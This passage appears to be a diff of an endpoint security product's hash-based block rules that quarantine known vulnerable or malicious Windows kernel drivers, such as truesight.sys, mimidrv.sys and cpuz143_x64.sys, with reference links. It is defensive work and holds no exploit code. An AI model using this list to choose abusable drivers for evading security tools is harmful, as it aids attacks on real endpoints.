+ "last_update": "2026-03-23T11:45:31.813322Z",
+ "creation_date": "2026-03-23T11:45:31.813325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813333Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e6fdd4baacdf0ab03ed12749d84e32423ea25dadc0e1a8c7d79f44397bc09951",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "be966eb6-bec3-53c3-bb70-c88309e979e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604825Z",
+ "creation_date": "2026-03-23T11:45:29.604827Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604832Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "078998502b2dd463b8acd5488ee18645c876bb50ebd87e1b0f9ff845a29a2098",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bea296e6-3bd8-5f55-9def-6620c0baf99e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611376Z",
+ "creation_date": "2026-03-23T11:45:29.611378Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611383Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "47c9323ae818bd2a3b55fc04abd984bd940cd4e27b6d4af311edcb66988ce941",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "beabe1d1-2fb2-5fab-bc50-ff1926806942",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.979151Z",
+ "creation_date": "2026-03-23T11:45:29.979153Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.979158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a826b4fa10891cf63aae832fc645ce680a483b915c608ca26cedbb173b1b80a",
+ "comment": "Vulnerable Kernel Driver (aka elrawdsk.sys) [https://www.loldrivers.io/drivers/205721b7-b83b-414a-b4b5-8bacb4a37777/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "beb2b947-cb6c-5c16-bd9c-ef99ef6f1c56",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820720Z",
+ "creation_date": "2026-03-23T11:45:30.820722Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820727Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d9a73df5ac5c68ef5b37a67e5e649332da0f649c3bb6828f70b65c0a2e7d3a23",
+ "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bec14d6b-515d-55ae-a358-dffb3e4754a1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620710Z",
+ "creation_date": "2026-03-23T11:45:29.620712Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620717Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f",
+ "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bec7c8fc-986e-5da0-8288-1fe4d0d1af2a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160118Z",
+ "creation_date": "2026-03-23T11:45:31.160120Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160126Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd35afd8d1b89bf4c00b5e9131f1abc82dc0492ec466b2c4b6bc6a633355b38a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bedc08e1-9d55-53ec-96eb-f7c2ac10eab7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485006Z",
+ "creation_date": "2026-03-23T11:45:31.485010Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485020Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "23b1fd33139874b173a22dfa0b9f240ce0c562e5e0da753986b934ed9a49e82d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bedf6623-4a2a-576e-a387-1ff4a0827455",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809758Z",
+ "creation_date": "2026-03-23T11:45:31.809761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809770Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "525e959c75100ce85a55dd0bc284f5ba49cee289f92c8d2c5184c31961bed7cc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "beeeec48-42d7-581a-a30a-c372a49a9c52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814094Z",
+ "creation_date": "2026-03-23T11:45:31.814098Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814107Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4afa14df5befa201438f898beaecd73750744a0dbdc065544c9b33edd5b79ded",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "befcfb04-7567-5250-809a-ec8a6ddba923",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824032Z",
+ "creation_date": "2026-03-23T11:45:31.824035Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824043Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ea577fad09163c9eb5dcfbfe629a06990453244e9c0abb582c223a6c2a1961ae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf08c60b-ae4d-574a-a101-317199e9ce0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.486322Z",
+ "creation_date": "2026-03-23T11:45:31.486325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.486332Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c3790006220e0e530320e78f0cad5127f3c90e02db53efd0ff07b5faa55fabd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf1274ca-4790-5d42-931a-b220d17af2a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.470400Z",
+ "creation_date": "2026-03-23T11:45:30.470404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.470413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1425075f7a3f009f703ca8d5bbbfe2cfbc1a7de7f5e17d50708ba99dc0f668ff",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf17718e-d443-584b-9715-a4ec1b72d81d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143598Z",
+ "creation_date": "2026-03-23T11:45:31.143600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143605Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "60c2dd1c26116e207db74d90fb6952797dd8e1f3dc54a0a9a34241be556778ac",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf362bdd-e443-50fb-947a-c39425923c58",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472920Z",
+ "creation_date": "2026-03-23T11:45:31.472923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472932Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ed00b27f65e9161f83cbed6ba033f4efb0af9160ea380b1a46c0421898089501",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf3b495b-5e32-5e06-8eca-0ec57efa5602",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482794Z",
+ "creation_date": "2026-03-23T11:45:31.482798Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482807Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e41cfb31e0fdd74f88c237d41672f8667af5179bde7cde0f32cb24101985de81",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf4b144d-8d34-553e-b7e4-072372b5f86f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500522Z",
+ "creation_date": "2026-03-23T11:45:31.500525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500533Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f3504feac7e57bd16959ff16abb9afbd7c9f6ceefcc3da8d0ae978219cabcf71",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf4d934d-6d28-5df4-86a1-d980771005ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495364Z",
+ "creation_date": "2026-03-23T11:45:31.495367Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495375Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10dd3a2c8745d92c95b8180775a87d7c17ddf6a88f14c59a41aa5fc78fdfe1a9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf4edc0b-cf2e-5b3b-a825-54197d6976f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816042Z",
+ "creation_date": "2026-03-23T11:45:30.816044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816050Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9452b5577681c74d568825c4e95c5c9a5e0f682782c8dd932a7d4d732e958802",
+ "comment": "Vulnerable Kernel Driver (aka ecsiodriverx64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf519582-f806-5ab3-b423-2e380ae63b48",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144192Z",
+ "creation_date": "2026-03-23T11:45:32.144196Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144204Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08c4b75a9b715647a60b946f3743c4e49a6f5c36c1bc889e741d658508dc50c0",
+ "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf556c4b-97d1-5f9b-a108-05e30c521d9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145447Z",
+ "creation_date": "2026-03-23T11:45:31.145449Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145455Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f4f2f346a3e8035163a4fea0a6c2df2cbe0ea19399b2269fa9d4eacfdd4083c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf5e4f01-2fe8-595b-bf7d-cda3125f35eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821690Z",
+ "creation_date": "2026-03-23T11:45:31.821692Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821698Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3cc8bbb5efb676b0aa2aea74d585bf1f7e245f81cbba8c79600373bfa37f509e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "bf652d58-5aa1-5652-b643-baf3f25f4735",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985593Z",
+ "creation_date": "2026-03-23T11:45:29.985595Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985601Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
